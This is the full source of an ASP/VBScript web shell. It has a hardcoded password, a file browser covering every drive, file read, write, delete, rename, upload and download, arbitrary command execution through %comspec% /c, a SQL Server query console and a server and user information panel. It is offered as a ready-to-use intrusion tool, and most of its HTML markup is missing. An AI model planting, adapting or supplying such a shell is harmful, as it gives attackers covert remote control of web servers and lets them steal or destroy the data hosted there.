Shell

<% @language = "VBScript" %> <% on error resume next dim fso, wshell, wnet dim fpath, i, folder, list dim FileName, ContentType, Value dim shell, password, style, this_url, root_path set fso = CreateObject("Scripting.FileSystemObject") set wshell = CreateObject("WScript.Shell") set wnet = Server.CreateObject("WScript.Network") root_path = fso.GetFolder(Server.MapPath("\")) & "\" this_url = Request.ServerVariables("URL") Server.ScriptTimeout = 120 Session.Timeout = 60 password = "pass" ' password style = "light" ' style sub Echo(line) response.write line end sub function S_GET(get_request) S_GET = Request.QueryString(get_request) end function function S_POST(post_request) S_POST = Request.Form(post_request) end function function this_path() if len(trim(S_GET("path"))) <> 0 and fso.FolderExists(trim(S_GET("path"))) then Response.Cookies("shell_path") = trim(S_GET("path")) this_path = trim(S_GET("path")) elseif len(Request.Cookies("shell_path")) = 0 or not fso.FolderExists(Request.Cookies("shell_path")) then Response.Cookies("shell_path") = root_path this_path = root_path else this_path = Request.Cookies("shell_path") end if end function function Action() if len(S_POST("download")) > 0 then action = "download" elseif S_POST("sql") > 0 then action = "sql" elseif S_GET("act") <> "" then action = trim(S_GET("act")) else action = "" end if end function sub Login() if Request.Cookies("shell_login") = password then exit sub %>

<% if S_POST("password") = password then Response.Cookies("shell_login") = password Response.Redirect this_url else Response.End end if end sub sub Logout() Response.Cookies("shell_login") = "" Response.Cookies("shell_path") = "" Response.Cookies("shell_sql") = "" Response.Redirect this_url Response.End end sub sub Downloader(filepath) dim downfile, stream Set downfile = fso.GetFile(filepath) set stream = Server.CreateObject("ADODB.Stream") Response.AddHeader "Content-Disposition", "attachment; filename=" & downfile.Name Response.ContentType = "application/octet-stream" Response.Charset = "UTF-8" stream.Open stream.Type = 1 stream.LoadFromFile(downfile.Path) Response.BinaryWrite(stream.Read) stream.Close Response.End set stream = Nothing set downfile = Nothing end sub sub FileBrowser(path) %> "> "> <% set folder = fso.GetFolder(path) if not folder.IsRootFolder then %> "> <% end if set list = folder.SubFolders for each i in list %> <% next set list = folder.Files for each i in list %> <% next set list = Nothing set folder = Nothing %>

CWD: <% GetCwd(this_path) %>	Home	Drives: <% Locations() %>
Name	Size	Permissions	Modified	Accessed	Created
..
<% echo i.Name %>\	Folder	<% echo getAttr(i.Attributes) %>	<% echo DateFormat(i.DateLastModified) %>	<% echo DateFormat(i.DateLastAccessed) %>	<% echo DateFormat(i.DateCreated) %>
&file=<% echo Server.URLEncode(i.Path) %>"><% echo i.Name %>	<% echo FormatNumber(i.Size, 0) %>	<% echo getAttr(i.Attributes) %>	<% echo DateFormat(i.DateLastModified) %>	<% echo DateFormat(i.DateLastAccessed) %>	<% echo dateFormat(i.DateCreated) %>

<% end sub function getAttr(attr) if attr = 0 or attr = 2 or attr = 4 or attr = 32 then getAttr = "read/write" elseif attr = 1 or attr = 8 or attr = 16 or attr = 64 or attr = 1024 or attr = 2048 then getAttr = "read" else getAttr = """" & attr & """" end if end function function DateFormat(d) DateFormat = FormatDateTime(d, 2) & " " & FormatDateTime(d, 4) end function sub GetCwd(path) dim temppath : temppath = "" set folder = fso.GetFolder(path) list = split(folder.path, "\") for each i in list temppath = temppath & i & "\" echo "" & i & "\" next set folder = Nothing end sub sub Locations() for each i in fso.Drives if i.IsReady then echo "" & i.DriveLetter & ":\ " else echo i.DriveLetter & ":\ " end if next end sub sub FileEditor(fpath) Dim content, data, message, f content = "" message = "" if trim(S_POST("fpath")) <> "" then fpath = trim(S_POST("fpath")) if (len(S_POST("read")) > 0) then if fso.FileExists(fpath) then set f = fso.OpenTextFile(fpath, 1) content = Server.HTMLEncode(f.readall) f.close set f = Nothing else message = "Can't access file." end if elseif len(S_POST("write")) > 0 then if fso.FolderExists(fpath) then message = "Use mkdir." else set f = fso.OpenTextFile(fpath, 2, 2) message = "Failed." data = Request.Form("content") f.write(data) if err.number = 0 then message = "File saved." f.close set f = nothing end if elseif len(S_POST("delete")) > 0 then message = "Failed." if fso.FileExists(fpath) then fso.deleteFile(fpath) if err.number = 0 then message = "File removed." elseif fso.FolderExists(fpath) then fso.DeleteFolder(fpath) if err.number = 0 then message = "Dir Removed." end if elseif len(S_POST("rename")) > 0 then message = "Failed." if fso.FileExists(S_GET("file")) then fso.MoveFile S_GET("file"), fpath if err.number = 0 then message = "Renamed." end if elseif len(S_POST("folder")) > 0 then message = "Failed." fso.CreateFolder(fpath) if err.number = 0 then message = "Created." end if %> <% echo message %>

<% echo content %>

<% end sub sub RunCmd() %> <% dim objCmd, cmd, cmd_result if len(S_POST("submit")) > 0 then cmd = "%comspec% /c " & trim(S_POST("cmd")) set objCmd = wshell.Exec(cmd) cmd_result = objCmd.StdOut.Readall() & objCmd.StdErr.ReadAll() echo "

" & replace(cmd_result, vbCrLf, "
") & "

" set objCmd = nothing end if end sub sub Database() Dim objCn, objRS, i, qry, sqlExec, host, user, pass, db, dbms host = dbValues("host") user = dbValues("user") pass = dbValues("pass") db = dbValues("db") dbms = dbValues("dbms") if S_GET("qry") <> "" then qry = trim(S_GET("qry")) if len(S_POST("submit")) > 0 then qry = S_POST("qry") if qry = "" then qry = "SELECT * FROM INFORMATION_SCHEMA.TABLES;" %> <% if len(S_POST("submit")) = 0 and len(S_GET("qry")) = 0 then exit sub Set objCn = Server.CreateObject("ADODB.Connection") objCn.ConnectionString = "DRIVER={SQL Server}; server=" & host & "; uid=" & user & "; pwd=" & pass & "; DATABASE=" & db & ";" objCn.Open set sqlExec = objCn.Execute(qry) if InStr(ucase(trim(qry)), "SELECT") <> 1 and InStr(ucase(trim(qry)), "SHOW") <> 1 then echo " Query submited. " exit sub end if echo "" echo "" for each i in sqlExec.Fields echo "" next echo "" sqlExec.MoveFirst do while not sqlExec.EOF echo "" for each i in sqlExec.Fields if i.name = "TABLE_NAME" then echo "" else echo "" end if next sqlExec.MoveNext echo "" loop echo "

" & i.name & "
" & i.value & "	" & i.value & "

" sqlExec.Close objCn.Close set sqlExec = Nothing Set objCn = Nothing end sub function dbValues(value) if trim(S_POST(value)) <> "" and S_POST("host") <> "host" then Response.Cookies("shell_sql")(value) = S_POST(value) dbValues = S_POST(value) elseif len(Request.Cookies("shell_sql")(value)) > 0 then dbValues = Request.Cookies("shell_sql")(value) else dbValues = value end if end function Function BuildUpload(RequestBin) dim PosBeg, PosEnd, boundary, boundaryPos, UploadControl, Pos, Name, PosFile, PosBound 'Get the boundary PosBeg = 1 PosEnd = InstrB(PosBeg, RequestBin, getByteString(chr(13))) boundary = MidB(RequestBin, PosBeg, PosEnd-PosBeg) boundaryPos = InstrB(1, RequestBin, boundary) 'Get all data inside the boundaries Do until (boundaryPos = InstrB(RequestBin, boundary & getByteString("--"))) 'Members variable of objects are put in a dictionary object Set UploadControl = CreateObject("Scripting.Dictionary") 'Get an object name Pos = InstrB(BoundaryPos, RequestBin, getByteString("Content-Disposition")) Pos = InstrB(Pos, RequestBin, getByteString("name=")) PosBeg = Pos + 6 PosEnd = InstrB(PosBeg, RequestBin, getByteString(chr(34))) Name = getString(MidB(RequestBin, PosBeg, PosEnd-PosBeg)) PosFile = InstrB(BoundaryPos, RequestBin, getByteString("filename=")) PosBound = InstrB(PosEnd, RequestBin, boundary) 'Test if object is of file type If PosFile <> 0 AND PosFile < PosBound Then 'Get Filename, content-type and content of file PosBeg = PosFile + 10 PosEnd = InstrB(PosBeg, RequestBin, getByteString(chr(34))) FileName = getString(MidB(RequestBin, PosBeg, PosEnd-PosBeg)) 'Add filename to dictionary object UploadControl.Add "FileName", FileName Pos = InstrB(PosEnd, RequestBin, getByteString("Content-Type:")) PosBeg = Pos + 14 PosEnd = InstrB(PosBeg, RequestBin, getByteString(chr(13))) 'Add content-type to dictionary object ContentType = getString(MidB(RequestBin, PosBeg, PosEnd - PosBeg)) UploadControl.Add "ContentType", ContentType 'Get content of object PosBeg = PosEnd + 4 PosEnd = InstrB(PosBeg, RequestBin, boundary) - 2 Value = MidB(RequestBin, PosBeg, PosEnd-PosBeg) Else 'Get content of object Pos = InstrB(Pos, RequestBin, getByteString(chr(13))) PosBeg = Pos + 4 PosEnd = InstrB(PosBeg, RequestBin, boundary) - 2 Value = getString(MidB(RequestBin, PosBeg, PosEnd - PosBeg)) End If UploadControl.Add "Value" , Value UploadRequest.Add name, UploadControl BoundaryPos = InstrB(BoundaryPos + LenB(boundary), RequestBin, boundary) Loop End Function Function getByteString(StringStr) For i = 1 to Len(StringStr) char = Mid(StringStr, i, 1) getByteString = getByteString & chrB(AscB(char)) Next End Function Function getString(StringBin) getString = "" For i = 1 to LenB(StringBin) getString = getString & chr(AscB(MidB(StringBin, i, 1))) Next End Function If request.querystring("upload") = "ok" then dim byteCount, RequestBin, UploadRequest, filepathname, path, f byteCount = Request.TotalBytes RequestBin = Request.BinaryRead(byteCount) Set UploadRequest = CreateObject("Scripting.Dictionary") BuildUpload(RequestBin) If UploadRequest.Item("file").Item("Value") <> "" Then contentType = UploadRequest.Item("file").Item("ContentType") filepathname = UploadRequest.Item("file").Item("FileName") filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\")) value = UploadRequest.Item("file").Item("Value") path = UploadRequest.Item("path").Item("Value") filename = path & filename Set f = fso.CreateTextFile(filename) For i = 1 to LenB(value) f.Write chr(AscB(MidB(value, i , 1))) Next f.Close Set f = Nothing End If Set UploadRequest = Nothing End If sub upload_form() %> <% end sub sub ServerInfo() %>

<% OsInfo() %>	Server: <% echo Request.ServerVariables("SERVER_SOFTWARE") %>
Computer: <% echo wnet.ComputerName %>	Domain: <% echo wnet.UserDomain %>	User: <% echo wnet.UserName %>	IP: <% echo request.ServerVariables("LOCAL_ADDR") %>

<% end sub sub OsInfo() dim SystemSet, System Set SystemSet = GetObject("winmgmts:").InstancesOf("Win32_OperatingSystem") for each System in SystemSet echo System.Caption & " " & System.Version next set SystemSet = nothing end sub function Colors(part) dim css if style = "dark" then css = array("#ddefff", "#181818", "#ddefff", "#83c5ff", "#202020") else css = array("#181818", "#f0f8ff", "#015fb2", "#00437e", "#ddefff") end if if part = "body" or part = "table" or part = "tr" or part = "th" or part = "td" then colors = "color:" & css(0) & "; background-color:" & css(1) & "; " elseif part = "input" then if style = "dark" then colors = "color:" & css(1) & "; background-color:" & css(0) & "; border:1px solid " & css(3) & "; " if style = "light" then colors = "color:" & css(4) & "; background-color:#242424 ; border:1px solid " & css(2) & "; " elseif part = "hover" then colors = "color:" & css(0) & "; background-color:" & css(4) & "; " else colors = css end if end function class AspShell public sub Access() Login() end sub public sub Download() if action() = "download" then Downloader(trim(S_GET("file"))) end sub public sub Header() ServerInfo() end sub public sub Remote() '' todo '' end sub public sub Body(action) if action = "fbrowser" then FileBrowser(this_path) elseif action = "feditor" then fpath = this_path() if trim(S_GET("file")) <> "" then fpath = trim(S_GET("file")) FileEditor(fpath) elseif action = "fuploader" then upload_form() elseif action = "cmd" then RunCmd() elseif action = "sql" then Database() elseif action = "exit" then Logout() end if end sub end class %> <% set shell = new AspShell %> <% shell.remote() %> <% shell.access() %> <% shell.download() %> Shell

<% shell.header() %>

<% shell.body(action())%>

<% set shell = nothing %> <% set fso = nothing %> <% set wshell = nothing %> <% set wnet = nothing %>